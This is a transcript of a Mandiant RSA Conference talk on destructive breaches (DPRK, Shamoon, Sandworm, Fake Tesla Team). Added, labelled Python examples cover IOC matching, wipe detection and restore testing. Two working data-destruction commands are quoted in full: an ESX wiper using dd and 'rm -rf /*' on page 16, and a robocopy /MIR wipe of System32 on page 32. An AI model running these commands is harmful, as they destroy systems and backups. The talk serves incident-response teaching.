Lessons Learned from Investigating Disruptive Data Breaches
RSA Conference, session FLE-F01

Vivek Chudgar, Senior Director, Mandiant, @VChudgar
Bart Inglot, Principal Consultant, Mandiant, @BartInglot

Transcript of the slides.

Page 1: Title slide (session ID and speakers as above)

Page 2: Agenda

• Perception of Destructive Breaches
• War Stories: Destructive North Korea, Troubles in the Persian Gulf, Russia vs Ukraine, False Flag Attack
• Lessons Learned

Page 3: Myth-Busting

“IT’S FASCINATING, BUT IT DOESN’T CONCERN ME”

Page 4: Myth-Busting “Breaches Don’t Happen in All Verticals”

(Chart: Total Industries Investigated)

Page 5: Myth-Busting “Breaches Don’t Happen in Asia Pacific”

Page 6: Myth-Busting “No Disruptive Breaches in Asia Pacific”

• Ransomware attacks wreak havoc on IT systems around the world
• Notably WannaCry (May 2017) and NotPetya (June 2017)
• Very creative – worm, reuse of cached credentials, WMI and PsExec, bootkit, supply chain attack, etc.
• Was it targeted?

Image by bleepstatic.com

Page 7: Myth-Busting “Formatting infected systems does the job”

(Diagram: Phishing Campaigns → Compromised Hosts → Corporate Network)

Page 8: Myth-Busting “Formatting infected systems does the job”

(Diagram: Phishing Campaigns → Compromised Hosts → ? ? ? → Accessed Hosts within the Corporate Network)

Page 9: Myth-Busting “Formatting infected systems does the job”

Statistics before (B) and after (A) the enterprise-wide investigation:

  Unique Malware     B: 5  / A: 229
  Stolen Passwords   B: 0  / A: 51
  Infected Systems   B: 3  / A: 154
  Attacker CnC       B: 12 / A: 98

Page 10: Myth-Busting “Formatting infected systems does the job”

• The attackers were present in the environment for 7 years
• Multiple attacker groups with possibly different missions
• The initial infection vector was unknown; gigabytes of data left the network
• Public and custom tools
  • Backdoors: ZXShell, Gh0stRAT, Metasploit, Zegost, GRILLMARK, etc.
  • Web shells: China Chopper, JspSpy, jFolder, etc.
  • Key loggers, email miners, credential dumpers, tunnelers, etc.
• Compromised VPN credentials

Page 11: Myth-Busting “Formatting infected systems does the job”

• Unable to perform routine work for a few months
• Several planned IT and transformational projects put on hold
• Service impact – e.g. the MSSP’s access was restricted
• Overall, disruptions to “the Business as Usual”

Page 12: Disruptive Data Breaches

DESTRUCTION / EXTORTION / RANSOM / PWNAGE

Page 13: Disruptive Data Breaches

DESTRUCTION / EXTORTION / RANSOM / PWNAGE (this section: Destructive)

Page 14: North Korea Background

• Students chosen from top universities in DPRK
  • Well paid in US dollars, free access to the Internet, and the opportunity to travel outside of DPRK
• Known for causing disruptive attacks
  • DDoS, website defacement, Master Boot Record (MBR) wiping, and publishing stolen data
• Attacks against victims are targeted and deliberate
  • Major attacks against organizations in Asia and North America
  • Ongoing attacks against South Korean media and financial services organizations since 2009

Page 15: North Korea Destructive Operations

• Multiple variants of malware designed to wipe Windows systems
• Malware was manually deployed by the attackers, but designed to spread automatically
• Malware operated differently depending on the type of system:
  1. Workstation – stopped antivirus and wrote a custom MBR to the disk
  2. Server – disabled Terminal Services
  3. Mail Server – stopped the mail service and disabled Terminal Services
  4. Domain Controllers – disabled Terminal Services and executed the wiper code only after a period of time, so that the malware could continue spreading first

Page 16: North Korea Destructive Operations (continued)

• Created script to wipe virtual machines on ESX servers
• The company’s backups were also erased

Wiper script recovered from the ESX servers, as shown on the slide (smart quotes and spacing lost in extraction restored):

  find / -type f -name "*.*" | grep -v "disks" | grep -v "\/dev" | awk '{print "ls -l \"" $0 "\"" }' | sh | awk '{if ($5>524288000) print "dd if=/dev/zero of=\"" $9 "\" bs=512k count=400 seek=400 conv=notrunc,noerror > /dev/null 2>&1 &"}' | sh
  sleep 1
  rm -r -f /boot/* & rm -r -f /vmfs/* & rm -r -f /* & rm -f /bin/* /sbin/* &
  exit

Page 17: North Korea Lessons Learned

• The level of access obtained by DPRK threat actors is no different from what China- and Russia-based threat actors obtain
• DPRK motivations are very different
• Ensure the backup environment is segmented from the corporate network

Page 18: Troubles in the Persian Gulf – More MBR Wiping Malware

Image by naukriingulf.com

Page 19: Shamoon Background

• 2012 – Widely publicised attack on an Oil & Gas company in the Middle East
• Designed to corrupt files and overwrite the MBR
• Nov 2016 – Recent resurgence targeting Gulf Cooperation Council (GCC) states
• Jan 2017 – Another wave of Shamoon attacks in GCC states

Page 20: Shamoon November 2016

• The identified malware exhibits destructive behavior on Windows-based operating systems
• The malware still uses a signed RawDisk driver from EldoS

File Name       Path                    PE Compile Time       MD5                               File Size (bytes)
ntssrvr64.exe   %SYSTEMROOT%\System32   2009-02-15 12:32:19   8fbe990c2d493f58a2afa2b746e49c86  717,312
ntssrvr32.exe   %SYSTEMROOT%\System32   N/A                   N/A                               1,349,632
ntssrvr32.bat   %SYSTEMROOT%\System32   N/A                   10de241bb7028788a8f278e27a4e335f  160
gpget.exe       %SYSTEMROOT%\System32   2009-02-15 12:30:41   c843046e54b755ec63ccb09d0a689674  327,680
drdisk.sys      %SYSTEMROOT%\System32   2011-12-28 16:51:29   76c643ab29d497317085e5db8c799960  31,632
key8854321.pub  %SYSTEMROOT%\System32   N/A                   b5d2a4d8ba015f3e89ade820c5840639  782
netinit.exe     %SYSTEMROOT%\System32   N/A                   b9bc61194bfb520c551817904a945840  183,808
netimm173.pnf   %SYSTEMROOT%\INF        N/A                   93b885adfe0da089cdf634904fd59f71  Varies
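The file table above is what an investigator turns into a sweep across the rest of the estate. The following is an added example, not code from the slides or from Mandiant: it loads the slide's indicators verbatim and matches them against a file inventory of the kind an EDR or a forensic collection exports. It assumes `%SYSTEMROOT%` resolves to `C:\Windows`; the host names, the inventory rows and the non-IOC hashes are constructed. A hash hit is reported wherever the file sits, while a name-only hit (the slide gives no hash for ntssrvr32.exe) is reported only in the listed directory, because the file name by itself is weak evidence.

```python
"""Match a host file inventory against the Shamoon (Nov 2016) file indicators listed on the slide."""
import ntpath
from dataclasses import dataclass

# Indicators exactly as listed on the slide: (file name, directory, MD5). None where the slide says N/A.
SHAMOON_IOCS = [
    ("ntssrvr64.exe",  r"%SYSTEMROOT%\System32", "8fbe990c2d493f58a2afa2b746e49c86"),
    ("ntssrvr32.exe",  r"%SYSTEMROOT%\System32", None),
    ("ntssrvr32.bat",  r"%SYSTEMROOT%\System32", "10de241bb7028788a8f278e27a4e335f"),
    ("gpget.exe",      r"%SYSTEMROOT%\System32", "c843046e54b755ec63ccb09d0a689674"),
    ("drdisk.sys",     r"%SYSTEMROOT%\System32", "76c643ab29d497317085e5db8c799960"),
    ("key8854321.pub", r"%SYSTEMROOT%\System32", "b5d2a4d8ba015f3e89ade820c5840639"),
    ("netinit.exe",    r"%SYSTEMROOT%\System32", "b9bc61194bfb520c551817904a945840"),
    ("netimm173.pnf",  r"%SYSTEMROOT%\INF",      "93b885adfe0da089cdf634904fd59f71"),
]


@dataclass
class Finding:
    host: str
    path: str
    indicator: str   # which slide entry matched
    confidence: str  # "hash": MD5 matched; "name": only file name + directory matched


def expand_dir(ioc_dir, systemroot=r"C:\Windows"):
    """Resolve %SYSTEMROOT% to the assumed install directory and lower-case it for comparison."""
    return ioc_dir.replace("%SYSTEMROOT%", systemroot).lower()


def match_inventory(inventory, systemroot=r"C:\Windows"):
    """inventory: iterable of (host, full_path, md5_hex) rows, e.g. from an EDR file-inventory export."""
    by_hash = {md5: name for name, _, md5 in SHAMOON_IOCS if md5}
    by_name = {(name.lower(), expand_dir(d, systemroot)): name for name, d, _ in SHAMOON_IOCS}
    findings = []
    for host, full_path, md5 in inventory:
        directory, fname = ntpath.split(full_path)   # ntpath handles Windows paths on any OS
        key = (fname.lower(), directory.lower())
        md5 = (md5 or "").lower()
        if md5 in by_hash:
            findings.append(Finding(host, full_path, by_hash[md5], "hash"))
        elif key in by_name:
            findings.append(Finding(host, full_path, by_name[key], "name"))
    return findings


# Constructed sample inventory (not real data): one hash hit in place, one name-only hit with an
# unknown hash, one benign system file, and one known hash dropped outside System32.
SAMPLE_INVENTORY = [
    ("ws-017", r"C:\Windows\System32\drdisk.sys",     "76C643AB29D497317085E5DB8C799960"),
    ("ws-017", r"C:\Windows\System32\ntssrvr32.exe",  "0123456789abcdef0123456789abcdef"),
    ("ws-017", r"C:\Windows\System32\kernel32.dll",   "fedcba9876543210fedcba9876543210"),
    ("srv-02", r"C:\Users\alice\Downloads\gpget.exe", "c843046e54b755ec63ccb09d0a689674"),
]

if __name__ == "__main__":
    for f in match_inventory(SAMPLE_INVENTORY):
        print(f"{f.host}: {f.path} matches {f.indicator} ({f.confidence})")
```

Run it against a real export by replacing SAMPLE_INVENTORY with the parsed rows; the two confidence levels are there so that name-only hits get triaged rather than acted on directly.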

Page 21: Shamoon Lessons Learned

• Old tricks can work even years later – the RawDisk driver
• Do not upload samples to VirusTotal if you suspect a targeted attack
  • Hard-coded credentials
  • Information specific to your business
  • Tips off the attackers

Page 22: Russia vs Ukraine – The Sandworm Team and War

Page 23: Sandworm Team Background

• Destructive malware impacting the Ukrainian financial sector (Dec 2016)
• Spearphishing lures with a Ministry of Finance theme
• The lure documents were similar to prior campaigns that targeted Boryspil Airport, the Ukrainian media, and the disrupted Ukrainian utilities

Page 24: Sandworm Team Destructive Operations

• At least one document was previously used as a Sandworm Team lure
  • Filename: Додаток №2.xls
  • MD5: b75c869561e014f4d384773427c879a6

Page 25: Sandworm Team Destructive Operations

• The campaign from Dec 2016 leveraged the STRAYKEY backdoor
• STRAYKEY uses the Telegram API for CnC
• Capabilities:
  • Running remote commands
  • Uploading and exfiltrating files
  • Downloading additional files

Page 26: Sandworm Team Destructive Operations

• Deployed WHITEROSE – destructive malware, a variant of "KillDisk"
• Ukrainian Government financial agencies affected
• Mr. Robot themed
• Two samples recovered (MD5):
  ffb1e8babaecc4a8cb3d763412294469
  b75c869561e014f4d384773427c879a6

Page 27: False Flag Attack – Extortion by the Fake Tesla Team

Image by studyabroad.com

Page 28: Fake Tesla Team Background

• Relatively unsophisticated threat, but very disruptive and destructive
• Compromised multiple natural resources and casino organizations in Canada
• Earliest known hacking activity dates back to 2013

Page 29: Fake Tesla Team Background

• Stole several gigabytes of sensitive data and published it on the Internet (The Pirate Bay, Pastebin.com, Photobucket.com, Justpaste.it, and others)
• Created scheduled tasks to destroy production systems across the enterprise
• Victims endured system outages for multiple days as they recovered data from backups
• Extorted victims to pay ransoms between $50K and $500K (BTC)

Page 30: Fake Tesla Team False Flags

• The real Tesla Team is believed to be a Serbian hacking group known for DDoS and defacement
• They are unlikely to be targeting Canadian organizations
• The threat actor previously claimed to be a Russian hacking group – “Angels of Truth”
• Likely use of Google Translate to write in Russian
• Claimed to be both “Anonymous Threat Agent” and “Tesla Team” with one victim

Page 31: Fake Tesla Team Tools, Tactics, Procedures (TTPs)

• Leveraged publicly available tools like Metasploit and SplinterRAT
• PowerShell used to load simple stagers that connect to CnC
• Custom malware has not been observed
• Multi-year campaigns – observed in one environment for nearly 1.5 years
• Leveraged single-factor VPN solutions for remote access

Page 32: Fake Tesla Team Tools, Tactics, Procedures (TTPs)

• Backdoors and VPN solution accessed over TOR or compromised IPs
• Known to engage journalists to advertise certain breaches
• Simple, yet effective technique to wipe systems (as shown on the slide):

  mkdir "C:\emptydir"
  robocopy "C:\emptydir" "C:\windows\system32" /MIR | shutdown /s /t 1800
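Because the wipe above is built from stock Windows tools, it leaves no malware to hash; what it does leave is a scheduled-task creation with a tell-tale command line. The following detection logic is an added example, not code from the slides or from Mandiant: it parses the command field of task-creation records (the record shape is loosely modelled on Security event 4698 and is an assumption, as are the host and task names) and flags a `robocopy /MIR` whose destination is a Windows system directory or a drive root, noting when a `shutdown` is chained behind it as on the slide. A legitimate nightly mirror to a NAS is included to show it is not flagged.

```python
"""Flag scheduled-task commands that mirror a directory over a Windows system directory with robocopy /MIR."""
import ntpath
import re
import shlex

# Destinations where a /MIR (mirror: delete everything at the destination that is absent from the source)
# launched from an ad-hoc task is never legitimate. Compared as suffixes of the lower-cased destination.
PROTECTED_SUFFIXES = (r"\windows\system32", r"\windows\syswow64", r"\windows",
                      r"\program files", r"\program files (x86)")


def split_chain(cmdline):
    """Split a cmd.exe command line on its pipe/chain operators (||, &&, |, &)."""
    return [seg.strip() for seg in re.split(r"\|\||&&|\||&", cmdline) if seg.strip()]


def tokens_of(segment):
    """Tokenise a cmd.exe segment, keeping quoted paths together and dropping the quotes."""
    try:
        return [t.strip('"') for t in shlex.split(segment, posix=False)]
    except ValueError:  # unbalanced quotes: fall back to a plain split
        return segment.split()


def analyse_command(cmdline):
    """Return the reasons a command line looks like a robocopy-based wipe; empty list if nothing suspicious."""
    wipe, shutdown_chained = [], False
    for segment in split_chain(cmdline):
        toks = tokens_of(segment)
        if not toks:
            continue
        exe = ntpath.basename(toks[0]).lower()
        if exe in ("robocopy", "robocopy.exe"):
            switches = {t.upper() for t in toks[1:] if t.startswith("/")}
            positional = [t for t in toks[1:] if not t.startswith("/")]  # source, destination, [files...]
            if "/MIR" in switches and len(positional) >= 2:
                dest = positional[1].lower().rstrip("\\")
                if re.fullmatch(r"[a-z]:", dest) or dest.endswith(PROTECTED_SUFFIXES):
                    wipe.append(f"robocopy /MIR into protected destination {positional[1]}")
        elif exe in ("shutdown", "shutdown.exe") and any(t.lower() in ("/s", "-s", "/r", "-r") for t in toks[1:]):
            shutdown_chained = True
    if wipe and shutdown_chained:
        wipe.append("shutdown chained after the mirror, as on the slide")
    return wipe


def scan_events(events):
    """events: dicts with host, task and command; returns (host, task, reasons) for every suspicious task."""
    hits = []
    for ev in events:
        reasons = analyse_command(ev["command"])
        if reasons:
            hits.append((ev["host"], ev["task"], reasons))
    return hits


# Constructed sample events (not real logs): the slide's wipe chain, a legitimate mirror to a NAS, a cleanup task.
SAMPLE_EVENTS = [
    {"host": "fs-01", "task": r"\Microsoft\Windows\WinUpdate",
     "command": r'cmd /c mkdir "C:\emptydir" & robocopy "C:\emptydir" "C:\windows\system32" /MIR | shutdown /s /t 1800'},
    {"host": "fs-01", "task": r"\Backup\Nightly",
     "command": r'robocopy "D:\data" "\\nas01\backups\data" /MIR /R:1 /W:1'},
    {"host": "ws-22", "task": r"\Cleanup",
     "command": r'cmd.exe /c "del /q C:\temp\*"'},
]

if __name__ == "__main__":
    for host, task, reasons in scan_events(SAMPLE_EVENTS):
        print(host, task, "; ".join(reasons))
```

The destination check is deliberately narrow (system directories and drive roots) so that ordinary `/MIR` backup jobs stay quiet; widen PROTECTED_SUFFIXES to your own critical paths rather than alerting on every mirror.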

Page 33: Fake Tesla Team Lessons Learned

• If you don’t pay, your data will likely be dumped
• They exaggerate their technical skills and ability to access environments
• Partial payments may be able to buy time

Understand that paying the extortion may be the right option in some scenarios, but there are no guarantees the attackers won’t come back for more money or simply leak the data anyway.

Page 34: Lessons Learned

Responding to disruptive breaches is challenging, and not easy to plan for given the dynamic nature of these attacks and the attackers.

Image by fourseasons.com

Page 35: Apply - Lessons Learned (1)

1. Engage experts before a breach (forensic, legal, public relations)
2. Confirm there actually is a breach
3. Establish if you are dealing with a human adversary
4. Remember that timing is critical
5. Keep focused on the incident
6. Consider all options when asked to pay ransom/extortion
7. Think of the ways your network could be accessed

Page 36: Apply - Lessons Learned (2)

8. Ensure strong segmentation and control over backups

Schrödinger’s Backup: the condition of any backup is unknown until a restore is attempted

Image by fatcat.ninja
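Both the ESX wiper and the Fake Tesla Team outages came down to whether a restore actually works, which is the point of the Schrödinger’s Backup line. The following is an added example, not code from the slides or from Mandiant, of what "attempt the restore" looks like as a routine check: back up a small constructed source tree, record a SHA-256 manifest that is kept apart from the backup, restore the archive into a fresh directory and compare every file against the manifest, then damage the archive and show the same check failing. File names, contents and the tar.gz format are assumptions for the demonstration.

```python
"""Schrödinger's backup: prove a backup is restorable by restoring it and checking every file against a manifest."""
import hashlib
import os
import tarfile
import tempfile
import zlib


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def make_manifest(src_dir):
    """Relative path -> SHA-256 for every regular file under src_dir, recorded at backup time."""
    manifest = {}
    for root, _, files in os.walk(src_dir):
        for name in files:
            full = os.path.join(root, name)
            manifest[os.path.relpath(full, src_dir)] = sha256_file(full)
    return manifest


def create_backup(src_dir, archive_path):
    """Write a gzip'd tar of src_dir and return the manifest to verify it against later (store it elsewhere)."""
    with tarfile.open(archive_path, "w:gz") as tar:
        tar.add(src_dir, arcname=".")
    return make_manifest(src_dir)


def verify_restore(archive_path, manifest, restore_dir):
    """Actually restore the archive into restore_dir, then compare what came back with the manifest.

    Returns (ok, problems). Members are written one by one so a damaged archive surfaces as a
    recorded problem rather than an unhandled exception, and paths escaping restore_dir are refused.
    """
    problems, restored = [], set()
    try:
        with tarfile.open(archive_path, "r:gz") as tar:
            for member in tar:
                if not member.isfile():
                    continue
                rel = os.path.normpath(member.name)
                if os.path.isabs(rel) or rel.startswith(".."):
                    problems.append(f"unsafe path in archive: {member.name}")
                    continue
                target = os.path.join(restore_dir, rel)
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with tar.extractfile(member) as src, open(target, "wb") as out:
                    out.write(src.read())
                restored.add(rel)
                if manifest.get(rel) != sha256_file(target):
                    problems.append(f"hash mismatch after restore: {rel}")
    except (tarfile.TarError, EOFError, OSError, zlib.error) as exc:
        problems.append(f"archive unreadable: {exc}")
    for rel in manifest:
        if rel not in restored:
            problems.append(f"missing after restore: {rel}")
    return (not problems), problems


def demo():
    """Constructed source tree: back it up, verify a clean restore, then verify again after damaging the archive."""
    with tempfile.TemporaryDirectory() as work:
        src = os.path.join(work, "src")
        os.makedirs(os.path.join(src, "db"))
        with open(os.path.join(src, "config.yml"), "w") as f:
            f.write("retention_days: 30\n")
        with open(os.path.join(src, "db", "customers.csv"), "w") as f:
            f.write("id,name\n" + "".join(f"{i},constructed-{i}\n" for i in range(500)))
        archive = os.path.join(work, "nightly.tar.gz")
        manifest = create_backup(src, archive)
        clean_ok, clean_problems = verify_restore(archive, manifest, os.path.join(work, "restore-clean"))
        # Simulate damaged media or a partially overwritten backup: keep only the first half of the archive.
        with open(archive, "r+b") as f:
            f.truncate(os.path.getsize(archive) // 2)
        damaged_ok, damaged_problems = verify_restore(archive, manifest, os.path.join(work, "restore-damaged"))
        return clean_ok, clean_problems, damaged_ok, damaged_problems


if __name__ == "__main__":
    print(demo())
```

The manifest is the part that has to live outside the backup system's reach (the same segmentation the slide asks for): if an attacker who wiped the ESX datastores could also rewrite the manifest, a restore test would prove nothing.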

Page 37: Apply - Lessons Learned (3)

9. After the incident has been handled, immediately focus on broader security improvements
10. If you kick them out, they will return

For additional information, see the Mandiant M-Trends 2017 Report:
https://www.fireeye.com/current-threats/annual-threat-report/mtrends.html

Page 38: Thank You

Vivek Chudgar, Senior Director, [email protected]
Bart Inglot, Principal Consultant, [email protected]